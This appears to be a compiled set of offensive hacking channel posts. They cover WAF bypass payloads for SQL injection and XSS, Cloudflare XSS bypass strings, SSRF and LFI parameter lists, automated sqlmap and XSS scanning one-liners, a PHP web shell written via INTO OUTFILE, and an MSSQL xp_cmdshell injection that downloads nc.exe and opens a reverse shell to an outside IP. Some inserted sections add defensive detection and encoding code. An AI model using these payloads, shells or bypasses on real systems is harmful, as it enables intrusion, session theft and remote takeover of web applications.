ExploitQuest
Bypass WAF firewall

To increase the likelihood that an injection test succeeds against a filter, you can vary the payloads using the following approaches, which exploit differences in how database servers parse the queries.


Using Substitutions in Keywords

You can substitute connectives such as or, xor and ||, and mix letter case, to evade keyword-based filters.
Example:

or sleep(4) ➔ oR sLeEP(4) or xor sleep(4)


Entering Camouflaged Spaces and Comments

Some filters may ignore comments or spaces. You can add comments like /**/ or use different types of spaces.
Example:

or sleep(4) ➔ or/**/sleep(4) or or sLeEp(/**/4)


Using Mathematical Expressions

Sometimes it can be useful to use mathematical expressions to avoid filters that look for explicit numbers.
Example:

4 ➔ 6-2 or true+true


Changing the simple formula

The formula for simple payloads can also be changed.
Example:

sleep(4) ➔ sleep((4)) or benchmark(4)


Mixing multiple payloads in a single request

You can combine two or more payloads to increase complexity.
Example:

%27 or sleep(4) -- ➔ %27 oR sLeEP(4) || true+true --
4|0 or benchmark(4) ➔ (4|0) oR beNCHMark(/**/4)



Entering different parentheses

Some databases handle parentheses differently. You can use alternate parentheses to bypass filters.
Example:

or (sleep(4)) ➔ or %28sleep%284%29


Using Uncommon Phrases

Using less common functions such as benchmark instead of sleep may avoid signatures written only for the usual form.
Example:

or sleep(4) ➔ or benchmark(4)


Logical Construct Tests

You can also wrap payloads in logical constructs.
Example:


or sleep(4) ➔ or (sleep(4) && true=true)



Complete example:

' oR sLeEP(/**/4) || true+true --



Here are some more random payloads to use in your SQL injection test:

'%27 OR sleep(4) --
%28%29 XOR sLeEp(4) --
(4|0) oR beNCHMark(/**/4) --
' OR 6-2=4 || sleep(4) --
') OR true+true=sleep(4) --
%27 oR sLeEp(4) = (true) --
' xor sLeEP((4)) --
%27 = (1=(sleep(4))) --
%28%29 OR beNcHmArk(4) --
' XOR sleep(/**/4) || -true*4 --



Combine some of these payloads:

You can mix payloads together to make the attack more complex:


'%27 OR sleep(4) || (true=true) -- ')


Varying payloads this way increases the chance that at least one form passes a signature-based filter or other protection method.
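As an added example (not from the post), here is the normalization step a signature-based filter needs in order to see through the substitutions listed above. The sample values are the post's own payloads plus one benign string; the function names and patterns are mine, not any real WAF's rules. It shows that a naive lowercase signature misses every variant, while matching after percent-decoding, comment stripping, case folding and whitespace collapsing catches all of them and still leaves the benign value alone:

```python
import re
from urllib.parse import unquote

# Constructed inputs: the obfuscated forms listed in the post above plus one
# benign value that the detector must leave alone.
SAMPLE_PARAMS = [
    "' oR sLeEP(/**/4) || true+true --",
    "(4|0) oR beNCHMark(/**/4) --",
    "%27 xor sLeEP((4)) --",
    "%28%29 OR beNcHmArk(4) --",
    "shirt size 4",   # benign
]

# The kind of literal signature a naive filter ships with: one case, one spacing.
NAIVE_SIGNATURE = re.compile(r"\bor sleep\(\d+\)")

# Signatures applied only after normalization (hypothetical names, not a real WAF's rules).
LOGIC_OR = re.compile(r"\bx?or\b|\|\|")
TIME_BASED = re.compile(r"\b(sleep|benchmark)\s*\(\(*\s*[\d\s+\-*/|()]+\)")


def normalize(value: str) -> str:
    """Canonicalize a parameter before matching: percent-decode, replace inline
    comments (used as separators) with a space, fold case, collapse whitespace."""
    v = unquote(value)
    v = re.sub(r"/\*.*?\*/", " ", v, flags=re.S)
    v = v.lower()
    return re.sub(r"\s+", " ", v).strip()


def naive_match(value: str) -> bool:
    """What a filter that matches the raw parameter sees."""
    return bool(NAIVE_SIGNATURE.search(value))


def normalized_match(value: str) -> bool:
    """Same idea, but applied to the canonical form: a boolean connective
    present together with a time-delay function call."""
    v = normalize(value)
    return bool(LOGIC_OR.search(v) and TIME_BASED.search(v))


def classify(values):
    """Map each value to (naive_verdict, normalized_verdict)."""
    return {v: (naive_match(v), normalized_match(v)) for v in values}


if __name__ == "__main__":
    for v, (naive, norm) in classify(SAMPLE_PARAMS).items():
        print(f"naive={naive!s:5} normalized={norm!s:5}  {v}")
```

Signature matching after normalization is still only a secondary control: the string that should never be built is the concatenated SQL query, and a parameterized query makes every keyword variation above irrelevant.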


#waf #sql
Bypassing WAF (Web Application Firewall) in XSS (Cross-Site Scripting) attacks relies on exploiting various techniques and methods to bypass the protection put in place by the firewall. WAF is designed to intelligently inspect inputs and requests to detect potential attacks such as XSS, but there are several ways to bypass these mechanisms. Here are some techniques that may help in bypassing WAF in XSS attacks:


1. Encoding
Input encoding can be used to confuse WAF and prevent malicious payload detection.

Examples:

URL Encoding:


<script>alert('XSS')</script>


URL-encoded, it becomes:

%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E


HTML Entity Encoding:
Special characters can be converted to HTML encoding:


&lt;script&gt;alert(&#39;XSS&#39;)&lt;/script&gt;


2. Using Comments

Some WAFs fail to match a signature when the tag name is split by an HTML comment.

Examples:

XSS using comments to split code:


<scr<!--comment-->ipt>alert('XSS')</scr<!--comment-->ipt>


3. Case Variation

A WAF's signatures may be case-sensitive. Changing the case of the tag name can keep the code from being detected.

Examples:


<ScRipT>alert('XSS')</sCrIpT>


4. Use Alternative Event Handlers

Events in HTML that may not be strictly checked by WAF, such as onfocus or onmouseover, can be exploited.

Example:


<img src="x" onerror="alert('XSS')">


May be replaced by:

<input onfocus="alert('XSS')">


5. Adding Padding Characters

You can add spaces or insignificant characters inside the malicious code to make it undetectable.

Examples:


<scr ipt>alert('XSS')</scr ipt>


6. Use eval(), setTimeout(), or setInterval()

Some WAFs scan for obvious code like alert() or document.write(). By using functions like eval() or setTimeout(), you can make malicious code less obvious.

Example:


<script>setTimeout(function(){alert('XSS')}, 100);</script>


7. JavaScript Coding Using String.fromCharCode

You can use the String.fromCharCode function to generate JavaScript code dynamically.

Example:


<script>alert(String.fromCharCode(88,83,83));</script>


String.fromCharCode(88,83,83) evaluates to "XSS", so the alert displays it without the literal string ever appearing in the request.

8. Using DOM-based XSS techniques

In some cases, WAF can be bypassed using techniques that rely on XSS in the DOM only, where the code is injected directly into the browser without having to send the request to the server.

Example:

var input = document.createElement('input');
input.setAttribute('onfocus', 'alert("XSS")');
document.body.appendChild(input);
input.focus();



9. Hiding code inside unexpected media

You can embed XSS code inside non-traditional HTML elements, such as SVG files or titles.

Example:


<svg onload="alert('XSS')"></svg>


10. Use complex conditional statements or mathematical functions

You can use conditional statements or mathematical operations to make malicious code less obvious to a WAF.

Example:


<script>if(1<2){alert('XSS')}</script>


11. Using javascript: in a URL

You can try to insert JavaScript code inside a URL using the javascript: protocol.

Example:

<a href="javascript:alert('XSS')">Click me</a>


12. Exploiting weak or non-comprehensive filters

Some WAFs may not scan all input types or fields. You can try to inject malicious code in unexpected places such as hidden fields or metadata.

Example:

Injecting malicious code into an unexpected field:


<input type="hidden" value="<script>alert('XSS')</script>">



Conclusion:
Bypassing WAF in XSS attacks requires experimenting with different techniques and using innovative ways to make the malicious code undetectable. Protection from these attacks depends on constantly updating WAF mechanisms and following good security practices such as input filtering and output encoding.
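As an added example (not from the post), here is the output-encoding side of the conclusion above: the same untrusted value rendered into an element body, a quoted attribute, and an href, each with the encoder that context requires. The inputs are constructed from the payload shapes listed in this post; the function names and the scheme allowlist are mine. Every payload form, including the case-varied tag, the comment-split tag, the attribute breakout and the javascript: URL, ends up as inert text:

```python
import html
import re

# Constructed inputs: the payload shapes from the list above, as an attacker
# might submit them. Each encoder must turn them into inert text.
UNTRUSTED = [
    "<ScRipT>alert('XSS')</sCrIpT>",
    "<svg onload=\"alert('XSS')\"></svg>",
    "<scr<!--comment-->ipt>alert('XSS')</scr<!--comment-->ipt>",
    "\" onfocus=\"alert('XSS')",        # tries to break out of an attribute
    "javascript:alert('XSS')",         # tries to become a clickable href
]

ALLOWED_SCHEMES = {"http", "https", "mailto"}   # assumption: what this app links to


def encode_for_html_text(value: str) -> str:
    """Element-body context: after this, '<' and '&' can no longer start markup."""
    return html.escape(value, quote=False)


def encode_for_html_attribute(value: str) -> str:
    """Quoted-attribute context: also escape both quote characters so the value
    cannot close the attribute and add an event handler of its own."""
    return html.escape(value, quote=True)


def safe_href(value: str) -> str:
    """URL context. Allowlist the scheme rather than blocklisting 'javascript:'.
    Browsers drop ASCII control characters inside a scheme, so the decision is
    made on a copy with those removed; the original text is what gets encoded."""
    cleaned = re.sub(r"[\x00-\x20]", "", value)
    match = re.match(r"^([a-z][a-z0-9+.\-]*):", cleaned, re.I)
    if match and match.group(1).lower() not in ALLOWED_SCHEMES:
        return "#"   # neutral placeholder instead of the untrusted URL
    return encode_for_html_attribute(value)


def render_comment(text: str, link: str) -> str:
    """One HTML fragment with untrusted values in three different contexts."""
    return (f'<div title="{encode_for_html_attribute(text)}">'
            f'{encode_for_html_text(text)}</div>'
            f'<a href="{safe_href(link)}">link</a>')


if __name__ == "__main__":
    for u in UNTRUSTED:
        print(render_comment(u, u))
```

The point of having three functions rather than one is that the encoding is chosen by where the value lands, not by what the value looks like; a filter that inspects the input for "<script" has to guess, while the encoder for the output context does not.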



#xss #waf
cloudflare bypass payloads


Payload:

<A HRef=//X55.is AutoFocus %26%2362 OnFocus%0C=import(href)>



Payload:

"*prompt(document.domain)*"


payload:

<img/src=x onError="`${x}`;alert(`Hello`);">


payload:

<img%20hrEF="x"%20sRC="data:x,"%20oNLy=1%20oNErrOR=prompt`1`>


payload:

<img/src/onerror=setTimeout(atob(/YWxlcnQoMTMzNyk/.source))>



payload:

"%3cSvg%20Only%3d1%20OnLoad%3dconfirm(1)%3e" 



payload:


<select><style></select><svg onload=alert(1)></style>


payload:

"><img src=x onerrora=confirm() onerror=confirm(1)>


payload:

<dETAILS%0aopen%0aonToGgle%0a%3d%0aa%3dprompt,a(origin)%20x>




Payload:

"><input%252bTyPE%25253d"hxlxmj"%252bSTyLe%25253d"display%25253anone%25253b"%252bonfocus%25253d"this.style.display%25253d'block'%25253b%252bthis.onfocus%25253dnull%25253b"%252boNMoUseOVer%25253d"this['onmo'%25252b'useover']%25253dnull%25253beval(String.fromCharCode(99,111,110,102,105,114,109,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41))%25253b"%252bAuToFOcus>



Payload:

%3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E





Payload:

&#34;&gt;&lt;track/onerror=&#x27;confirm\%601\%60&#x27;&gt;



Payload:

"><track/onerror='confirm`1`'>


Payload:

<inpuT autofocus oNFocus="setTimeout(function() { /*\*/top['al'+'\u0065'+'rt']([!+[]+!+[]]+[![]+[]][+[]])/*\*/ }, 5000);"></inpuT%3E&lT;/stYle&lT;/titLe&lT;/teXtarEa&lT;/scRipt&gT;


Payload:

<inpuT autofocus oNFocus="setTimeout(function() { /*\`*/top['al'+'\u0065'+'rt']([!+[]+!+[]]+[![]+[]][+[]])/*\`*/ }, 5000);"></inpuT%3E&lT;/stYle&lT;/titLe&lT;/teXtarEa&lT;/scRipt&gT;




#xss #waf #cloudflare #bypass
Top 25 SSRF parameters

• ?dest={target}
• ?redirect={target}
• ?uri={target}
• ?path={target}
• ?continue={target}
• ?url={target}
• ?window={target}
• ?next={target}
• ?data={target}
• ?reference={target}
• ?site={target}
• ?html={target}
• ?val={target}
• ?validate={target}
• ?domain={target}
• ?callback={target}
• ?return={target}
• ?page={target}
• ?feed={target}
• ?host={target}
• ?port={target}
• ?to={target}
• ?out={target}
• ?view={target}
• ?dir={target}
⚡️ Exploit for CVE-2024-8504 & CVE-2024-8503: SQLi and RCE ⚡️



https://github.com/Chocapikk/CVE-2024-8504/blob/main/
## Reverse Engineering the XSS Cloudflare WAF Bypass

Let's break down how this XSS payload bypasses Cloudflare's WAF:


Encoded Payload:

&#34;&gt;&lt;track/onerror=&#x27;confirm%601%60&#x27;&gt;



Clean Payload:

"><track/onerror='confirm`1`'>



Encoding Techniques:

* HTML Entity Encoding: The double quote (") is encoded as &#34; and the greater-than symbol (>) is encoded as &gt;. This helps evade basic WAF filters that look for these characters in their raw form.
* URL Encoding: The backtick (`) is URL-encoded as %60. This can help bypass filters that specifically look for the backtick character, which is commonly used in XSS payloads.


Bypass Mechanism:


1. HTML Entity Decoding: The browser decodes the HTML entities &#34; and &gt; back into their original characters: " and >.
2. URL Decoding: The browser decodes %60 back to a backtick (`).
3. Payload Execution: The resulting payload becomes:



"><track/onerror='confirm`1`'>


This injects a <track> tag into the HTML. The onerror attribute allows us to execute JavaScript when an error occurs during track loading.
4. JavaScript Execution: The JavaScript code confirm`1` is a tagged template literal, which JavaScript treats as a call to confirm without parentheses. Since confirm() is a built-in JavaScript function, this triggers a confirmation popup box and demonstrates successful XSS execution.


Why this bypasses Cloudflare WAF:


Cloudflare's WAF likely has rules to detect common XSS patterns, including the use of <script>, eval(), and potentially even onerror with specific event handlers. However, by combining HTML entity encoding and URL encoding, the attacker has obfuscated the payload enough to bypass these basic checks.


Key Takeaways:


* Encoding Techniques are crucial for bypassing WAFs: Attackers use various encoding methods to make malicious payloads appear benign.
* WAFs need to be constantly updated: WAF rules need to evolve to catch increasingly sophisticated bypass techniques.
* Understanding the underlying mechanisms is key to both attack and defense: By analyzing how a payload works, we can better understand how to craft effective bypasses and how to improve WAF rules to prevent them.


Note: This is a simplified explanation. Real-world WAF bypasses can be much more complex and involve multiple layers of obfuscation and exploitation techniques.
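As an added example (not from the post), here is the decoding chain walked through above, implemented the way a detection layer would apply it before matching: HTML-entity decoding and percent-decoding are repeated until the string stops changing, and the number of rounds is reported. The constructed inputs are the encoded <track> payload from this post (assumed here without the backslash escapes shown in the earlier payload list), a triple-percent-encoded attribute in the style of the %25253d Cloudflare payload posted earlier, and a benign value; the function and pattern names are mine, not any product's:

```python
import html
import re
from urllib.parse import unquote

# Constructed inputs. "track" is the encoded payload discussed above, written
# without the markdown backslash escapes; "triple" mimics the %25253d style of
# one of the Cloudflare payloads posted earlier; "benign" is ordinary form data.
SAMPLES = {
    "track":  "&#34;&gt;&lt;track/onerror=&#x27;confirm%601%60&#x27;&gt;",
    "triple": "%25253cinput%252bonfocus%25253dalert(1)%25253e",
    "benign": "Tom &amp; Jerry 50%25 off",
}

MAX_ROUNDS = 5   # hard cap so a pathological input cannot keep the loop busy

# Hypothetical signature: an element whose attribute list contains an on* handler.
EVENT_HANDLER = re.compile(r"<\s*\w+[^>]*\bon\w+\s*=", re.I)


def decode_once(value: str) -> str:
    """One pass of the two decoders the post describes: HTML entities first,
    then percent-encoding."""
    return unquote(html.unescape(value))


def decode_to_fixpoint(value: str, max_rounds: int = MAX_ROUNDS):
    """Repeat decoding until the string stops changing. Returns the canonical
    form and the number of rounds that actually changed something."""
    current, rounds = value, 0
    while rounds < max_rounds:
        nxt = decode_once(current)
        if nxt == current:
            break
        current, rounds = nxt, rounds + 1
    return current, rounds


def looks_like_markup_injection(value: str):
    """Match the signature against the canonical form; also return the round
    count, which is itself a signal worth logging."""
    canonical, rounds = decode_to_fixpoint(value)
    return bool(EVENT_HANDLER.search(canonical)), rounds


if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        verdict, rounds = looks_like_markup_injection(raw)
        print(f"{name:7} rounds={rounds} flagged={verdict} -> {decode_to_fixpoint(raw)[0]}")
```

Matching before any decoding is exactly the gap the post describes; matching after a single decode still misses the triple-encoded form, which is why the round count is worth keeping: ordinary form data very rarely needs more than one pass.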


#xss #waf
Finding Parameter + XSS using Arjun & KXSS

arjun -q -u target -oT arjun && cat arjun | awk -F'[?&]' '{baseUrl=$1; for(i=2; i<=NF; i++) {split($i, param, "="); print baseUrl "?" param[1] "="}}' | kxss

kxss

Arjun

#xss
#bug_bounty
One liner to find RCE

cat targets.txt | httpx -path "/cgi-bin/admin.cgi?Command=sysCommand&Cmd=id" -nc -ports 80,443,8080,8443 -mr "uid=" -silent
Bypass XSS Filter with Array

Payload :
<noscript><p title="</noscript><img src=x onerror=([,O,B,J,E,C,,]=[]+{},[T,R,U,E,F,A,L,S,,,N]=[!!O]+!O+B.E)[X=C+O+N+S+T+R+U+C+T+O+R][X](A+L+E+R+T+(document.cookie))()>">

#xss #waf
Method for finding SQLi vulnerabilities:

Command Line Tools Like a Pro

1.

sublist3r -d target | tee -a domains.txt


2.

cat domains.txt | httpx | tee -a alive.txt


3.


cat alive.txt | waybackurls | tee -a urls.txt


4.

gf sqli urls.txt >> sqli.txt


5.

sqlmap -m sqli.txt --dbs --batch --level 3 --risk 2 --time-sec 10 --random-agent


#sqli #sql
A one-liner to find an XSS vulnerability; you can edit it and add other tools:



echo "testphp.vulnweb.com" | waybackurls | gf xss | uro | qsreplace '"><img src=x onerror=alert(1);>' | freq


#xss
SQLMap from Waybackurls

waybackurls target | grep -E '\bhttps?://\S+?=\S+' | grep -E '\.php|\.asp' | sort -u | sed 's/\(=[^&]*\)/=/g' | tee urls.txt | sort -u -o urls.txt && cat urls.txt | xargs -I{} sqlmap --technique=T --batch -u "{}"

#sql
LFI Vulnerability Testing

?dir={payload}
?action={payload}
?date={payload}
?detail={payload}
?file={payload}
?download={payload}
?path={payload}
?folder={payload}
?include={payload}
?page={payload}
?locate={payload}
?site={payload}

#LFI
Transition from SQL injection to shell or backdoor

We use the INTO OUTFILE clause to write a file:


' union select 1, '<?php system($_GET["cmd"]); ?>' into outfile '/var/www/dvwa/cmd.php' # 

We capture the request in Burp Proxy, save it to the file post-request, then run sqlmap:

sqlmap -r post-request -p item --level=5 --risk=3 --dbms=mysql --os-shell --threads 10

Reverse netcat shell via MSSQL injection when xp_cmdshell is available:

1000';+exec+master.dbo.xp_cmdshell+'(echo+open+10.11.0.245%26echo+anonymous%26echo+whatever%26echo+binary%26echo+get+nc.exe%26echo+bye)+>+c:\ftp.txt+%26+ftp+-s:c:\ftp.txt+%26+nc.exe+10.11.0.245+443+-e+cmd';--

#sql #shell